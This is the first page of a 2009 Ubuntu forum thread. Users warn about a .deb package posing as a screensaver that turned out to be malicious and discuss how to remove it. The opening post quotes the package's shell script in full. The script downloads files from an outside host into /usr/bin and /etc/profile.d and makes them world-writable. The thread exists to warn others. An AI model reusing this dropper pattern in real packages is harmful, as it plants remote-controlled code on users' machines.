Page 1 of 5 123 ... LastLast
Results 1 to 10 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

Hybrid View

  1. #1
    Join Date
    Dec 2007
    Beans
    124

    Exclamation YOU THERE!! Malicios script installed as a DEB, please read!

    Hello guys Im going to make this breef

    I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

    after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    Im no expert but this looks just wrong!!

    I have removed the package however I i doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

    Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, Just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    Last edited by dmizer; December 9th, 2009 at 02:06 AM. Reason: removed hyperlinking to malitious urls

  2. #2
    Join Date
    Dec 2009
    Beans
    3

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Excuse my noobishness, but it appears that the DEB replace those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked though.

  3. #3
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I;m not seeing it do much. for instance the bash replacement seems to just ping a site "mmowned.com " or some such.

  4. #4
    Join Date
    Dec 2007
    Beans
    124

    Exclamation Re: YOU THERE!! Malicios script installed as a DEB, please read!

    OK guys please help me remove from gnome-look this file i have browsed the source codes and it contains something definatley malicious

    http://www.gnome-look.org/content/sh...content=116772

    please dont install it

    im working on contacting others who have installed it and redirecting them here to resolve the issue
    Last edited by conorsulli; December 9th, 2009 at 05:27 AM.

  5. #5
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
    Another day has passed and I'm just a little bit smarter.

  6. #6
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by Enlightened Shadow View Post
    OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
    Go check /etc/profile.d and see if there is a "gnome.sh" there (a deceptive name!). If it is, post it here.

    It probably is not intended to do any harm to your system if it is for DoS stuff, but it could actually be for anything.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  7. #7
    Join Date
    Apr 2007
    Location
    Hamden, CT
    Beans
    649
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by Enlightened Shadow View Post
    OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
    lol 0wned!

  8. #8
    Join Date
    Jul 2009
    Location
    Dayton Ohio USA
    Beans
    1,070
    Distro
    Ubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    What scares me is the fact that I've used GTK themes from this link before. Owners need to police content!

  9. #9
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by MooPi View Post
    What scares me is the fact that I've used GTK themes from this link before. Owners need to police content!
    The owner could not have been mistaken about the fact that that was not a screensaver.

    GTK themes are easy to write and might make a good trojan horse here, I'm still betting they are DoS wannabes.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  10. #10
    Join Date
    Jul 2009
    Location
    Dayton Ohio USA
    Beans
    1,070
    Distro
    Ubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    What is the link(url) for this alleged screensaver
    Please not as hyper link but plain text.

Page 1 of 5 123 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •